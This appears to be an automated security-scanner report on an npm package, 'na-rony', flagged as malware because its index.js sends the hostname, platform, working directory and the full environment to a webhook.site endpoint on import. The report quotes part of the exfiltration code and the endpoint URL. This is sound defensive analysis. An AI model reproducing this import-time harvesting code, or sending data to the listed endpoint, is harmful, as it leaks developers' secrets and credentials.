AI Security Review
scanned 2h ago · by lpm-firewall-ai
The package exfiltrates host identity, current working directory, platform, and all environment variables when its main module is loaded. The endpoint is an external webhook.site URL unrelated to package functionality.
Static reason
One or more suspicious static signals were detected.
Trigger
runtime import/require of package main index.js
Impact
Secrets in environment variables and project path/host metadata can be disclosed to the package author-controlled webhook.
Mechanism
import-time environment and host fingerprint exfiltration over HTTPS
Attack narrative
When a consumer imports na-rony, package.json resolves main to index.js. That file immediately builds a JSON object containing hostname, platform, cwd, and the complete process.env, then sends it via HTTPS POST to a webhook.site endpoint. There is no apparent benign package functionality around this behavior.
Rationale
Direct source inspection confirms import-time credential/environment harvesting and external exfiltration with no user consent or package-aligned purpose. This is concrete malicious behavior and should be blocked.
Evidence
index.js, package.json
Network endpoints (1)
webhook.site/20a7921e-7280-4e44-9235-4a3e82631430
Decision evidence
public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports https and os, then runs immediately at module load.
- index.js serializes os.hostname(), process.platform, process.cwd(), and full process.env.
- index.js POSTs collected host/environment data to webhook.site.
- package.json main points to index.js, so requiring the package triggers exfiltration.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks.
- No child_process, eval, persistence, destructive actions, or AI-agent control-surface writes found.
- Package contains only package.json and index.js.
Behavioral surface
EnvironmentVars, Network, UrlStrings
Source & flagged code
1 flagged · index.js
const https = require("https");
const os = require("os");
...
const data = JSON.stringify({
  hostname: os.hostname(),
  platform: process.platform,
  cwd: process.cwd(),
  env: process.env,
});
...
});
req.write(data);
req.end();
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
index.js · L1
Findings
1 High, 2 Medium, 2 Low
High: Host Fingerprint Exfiltration (index.js)
Medium: Network
Medium: Environment Vars
Low: Scripts Present
Low: Url Strings